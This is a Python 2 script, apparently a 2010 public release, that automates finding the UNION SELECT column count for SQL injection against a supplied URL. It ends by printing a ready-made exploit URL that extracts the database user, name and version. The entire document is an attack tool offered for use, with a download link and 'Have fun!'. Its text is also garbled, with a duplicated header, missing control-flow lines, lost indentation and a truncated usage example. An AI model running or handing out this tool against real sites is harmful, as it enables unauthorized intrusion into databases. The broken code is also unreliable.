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Column fuzzer

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Column fuzzer

# Full Automated Column Finder for SQL Injection

# Column fuzzer, version 1.1 (23th May 2010)

# By Valentin Hoebel (valentin@xenuser.org)



# Useful for SQL Injections. The script tries to determine the amount

# of columns needed for a successfull SQL Injection, e.g.

# target/index.php?id=1+AND+1=2+UNION+SELECT+1,2--


# Full Automated Column Finder for SQL Injection

# Column fuzzer, version 1.1 (23th May 2010)

# By Valentin Hoebel (valentin@xenuser.org)



# Useful for SQL Injections. The script tries to determine the amount

# of columns needed for a successfull SQL Injection, e.g.

# target/index.php?id=1+AND+1=2+UNION+SELECT+1,2--


# You may copy, modify and use this code without asking me for permission

# Share it, use it!

# For educational purposes only. I am not responsible for any damage you might

# cause with this script.


# Thanks to rsauron from darkc0de for the awesome Python scripts!

# Greetz to cr4wl3r (you know why :D ! ) && all my friends and ppl who support me!



# Usage: python column_finder.py -u http://target-domain.tld/file.php?some_var=some_integer

# Example:

# python column_finder.py -u

# Don't forget to supply a correct value for the var or script won't work (e.g. id=1, but NOT id=)!



# Changelog:

# -------------------------------------------------

# Version 1.1 - 23th May 2010

# - Some small changes


# Version 1- 22th May 2010

# - Public release

import sys, re, urllib, urllib2, string

from urllib2 import Request, urlopen, URLError, HTTPError

# Define the max. amounts for trying

max_columns = 100

# Prints usage

def print_usage():

print ""

print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>"

print "Full Automated Column Finder for SQL Injection by Valentin Hoebel (valentin@xenuser.org)"

print "Version: 1.1 (23th May 2010)"

print "Usage:"

print " -u <URL> (e.g. -u http://target/index.php?id=1)"

print " --help (displays this text)"

print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"

print ""

print ""


#Prints banner

def print_banner():

print ""

print ""

print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>"

print ""

print "Full Automated Column Finder for SQL Injection"

print "by Valentin Hoebel (valentin@xenuser.org)"

print ""

print "Version: 1.1 (23th May 2010)"

print ""

print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"

print ""


# Testing if URL is reachable, with error handling

def test_url():

print ">> Checking if connection can be established..."


response = urllib2.urlopen(provided_url)

except HTTPError, e:

print ">> The connection could not be established."

print ">> Error code: ", e.code

print ">> Exiting now!"

print ""


except URLError, e:

print ">> The connection could not be established."

print ">> Reason: ", e.reason

print ">> Exiting now!"

print ""



valid_target = 1

print ">> Connected to target! URL seems to be valid."

print ""


# Find correct amount of columns for the SQL Injection

def find_columns():

# Define some important variables and make the script a little bit dynamic

number_of_columns = 1

column_finder_url_string = "+AND+1=2+UNION+SELECT+"

column_finder_url_message = "0x503077337220743020743368206330777321"

column_finder_url_message_plain = "P0w3r t0 t3h c0ws!"

column_finder_url_terminator = "--"

next_column = ","

column_finder_url_sample = "concat(user(),database(),version())"

print ">> Trying to find the correct number of columns..."

# Craft the final URL to check

final_check_url = provided_url+column_finder_url_string+column_finder_url_message

for x in xrange(1, max_columns):

# Visit website and store response source code of site

final_check_url2 = final_check_url+column_finder_url_terminator

response = urllib2.urlopen(final_check_url2)

html = response.read()

find_our_injected_string = re.findall(column_finder_url_message_plain, html)

# When the correct amount was found we display the information and exit

if len(find_our_injected_string) != 0:

print ">> Correct number of columns found!"

print ">> Amount: ", number_of_columns

# Ask if a sample URL should be provided

user_reply = str(raw_input(">> Do you want to have a sample URL for exploiting? (Yes/No) "))

if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":

print ""

# Print a sample URL for exploiting and replace test string with some useful stuff

print string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample)

print ""

print "Simply copy and paste this link into your browser :) Have fun! Bye :)"

print ""

print ""



print ">> Ok, bye =)"

print ""

print ""


# Increment counter var by one

number_of_columns += 1

#Add a new column to the URL

final_check_url += next_column

final_check_url += column_finder_url_message

# If fuzzing is not successfull print this message

print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?"

# Checking if argument was provided

if len(sys.argv) <=1:



for arg in sys.argv:

# Checking if help was called

if arg == "--help":



# Checking if URL was provided, if yes -> go!

if arg == "-u":

provided_url = sys.argv[2]


# At first we test if we can actually reach the provided URL


# Now start with finding the correct amount of columns


print ""

print ""

### EOF ###

Download: http://xenuser.org/tools/column_finder.py

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